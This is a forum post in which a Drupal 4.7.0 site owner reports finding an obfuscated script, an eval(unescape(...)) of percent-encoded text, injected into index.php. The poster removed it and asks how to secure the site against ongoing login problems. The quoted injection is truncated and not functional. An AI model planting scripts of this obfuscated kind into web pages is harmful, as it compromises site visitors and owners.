OK.
My site is on 4.7.0. LAMP. (love how that covers everything). Shared hosting. Just started using the Bluebreeze theme.
Yesterday afternoon, the admin on my site emailed me and said, she couldn't access the site, she was getting this error:
Parse error: parse error, unexpected '<' in /animecards.org/index.php on line 36
And naturally, I thought, what the hell, it was working this morning, random brackets do NOT usually suddenly appear.
But googling this error didn't bring up anything relevant, so I actually LOOKED in the index.php file to find:
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%7BUNCHMOREGIBBERISH")); </script>
Yeaaaaaaaaaaaah, not very drupally. In my head, scary words like "Script injection" popped in...
I deleted it, restored the original file. But now what? Am I done?
My users are now reporting log in problems (white pages, login doesn't take). But the site just came off a long maintenance break where I changed the theme and disabled the loggintobaggin module. I don't know what to blame. What should I check? For now I put the site in maintenance mode. I want to make sure it's safe for users to login before opening it back up.
Things I did try:
- Downloading all the drupal files and searching for similar script injections, no real luck(?).
- I optimized my mysql database.